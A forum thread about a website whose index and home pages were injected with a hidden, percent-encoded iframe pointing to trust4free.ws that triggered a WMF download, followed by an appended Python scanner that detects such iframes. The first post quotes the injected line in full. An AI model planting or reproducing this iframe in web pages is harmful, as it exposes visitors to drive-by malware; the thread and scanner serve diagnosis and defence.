Is my website being hacked?

jimi_81

OK, I went to check on a site I maintain, and the page did not display; instead I was routed to download a WMF file.

The two files that the page uses to launch, index.html and home.php, had the following lines of code at the top of each file:

Code:
<iframe src= http://%77%77%77%2E%74%72%75%73%74%34%66%72%65%65%2E%77%73?id=index12 frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>

I didn't check the file's last modified date... I just made the correction without thinking.

Has anyone ever heard of this happening?
What happened!
 
Where is the site hosted? If it's a free host, it may be explainable.
 
I had the same thing happen to me. It's clearly a hack of some sort, since I'm on a paid host. I checked the "last modified" date and then my access logs, which revealed nothing out of the ordinary. I have a feeling that, since I'm on a shared host, someone else on the server was running vulnerable software (or maybe even the server itself) and just searched for every "public_html/index.html" (and probably other files like "home.php" there) it could find on the server.

Unfortunately, I wish I had some answers as to its origin. I haven't been able to find any information myself.

Melon
 
Some things I have been looking at in the logs...
Under browser lists, I see something called Curl. Never heard of it.

I googled Curl... what does this mean:
curl is a command line tool for transferring files with URL syntax, supporting FTP, FTPS, TFTP, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE and LDAP. curl supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading, HTTP form based upload, proxies, cookies, user+password authentication (Basic, Digest, NTLM, Negotiate, kerberos...), file transfer resume, proxy tunneling and a busload of other useful tricks.

According to the stats page, only 1 user has curl, 1 hit registered. Looks odd, that's why I bring it up.

The site is hosted on ipowerweb.com... I've reported it to them.
The URL the iframe points to is a shady-looking site: trust4free.ws
 
I feel sick to my stomach.
ipowerweb seems to be the problem.

I won't be renewing with them, that's for sure.
What a piss off.

Thanks guys, reps
 
It could just be a vulnerable install of some web-based software (awstats, phpBB, etc.) on the same server as your site.

Happened to me, site was blatantly defaced though, so it was spotted straight away.
 
curl is a pretty standard utility to transfer files, I use it all the time. It is also implemented in quite a few web search robots, and it can of course also be used for bad.

http://curl.haxx.se
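
A defender-side check for the injection described in the first post, as an added example that is not part of the original thread: it scans web files for iframes that load a foreign host, decodes percent-encoded hostnames, and reports each file's last-modified time so it can be matched against access and FTP logs. The function names and the `example.org` own-host value are assumptions.

```python
import os
import re
import time
from urllib.parse import unquote, urlsplit

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

# Injected line quoted in the first post, followed by a constructed benign page.
SAMPLE = (
    '<iframe src= http://%77%77%77%2E%74%72%75%73%74%34%66%72%65%65%2E%77%73?id=index12 '
    'frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>\n'
    '<html><body><iframe src="http://example.org/map" width="400" height="300">'
    '</iframe></body></html>\n'
)

def _px(value):
    """Leading integer of a width/height attribute, or None if absent."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None

def scan_text(html, own_hosts=()):
    """Return one finding per <iframe> whose src points at a host not in own_hosts."""
    findings = []
    for tag in IFRAME_RE.finditer(html):
        attrs = {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
                 for m in ATTR_RE.finditer(tag.group(1))}
        raw_host = urlsplit(attrs.get("src", "").strip()).netloc
        host = unquote(raw_host).lower()  # %77%77%77... becomes readable text
        if not host or host in own_hosts:  # relative or own-site frames are fine
            continue
        reasons = ["foreign host"]
        if "%" in raw_host:
            reasons.append("percent-encoded host")
        w, h = _px(attrs.get("width")), _px(attrs.get("height"))
        if w is not None and h is not None and w <= 1 and h <= 1:
            reasons.append("invisible (<=1px)")
        findings.append({"host": host, "offset": tag.start(), "reasons": reasons})
    return findings

def scan_tree(root, own_hosts=(), exts=(".html", ".htm", ".php")):
    """Scan web files under root; returns (path, UTC mtime, findings) per hit file."""
    report = []
    for dirpath, _dirs, files in os.walk(root):
        for name in (f for f in files if f.lower().endswith(exts)):
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read(), own_hosts)
            if hits:
                mtime = time.gmtime(os.path.getmtime(path))
                report.append((path, time.strftime("%Y-%m-%d %H:%M:%S", mtime), hits))
    return report
```

Run `scan_tree` over the document root before cleaning anything, and keep the reported timestamps: they are the detail the original poster lost by editing the files first.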
 
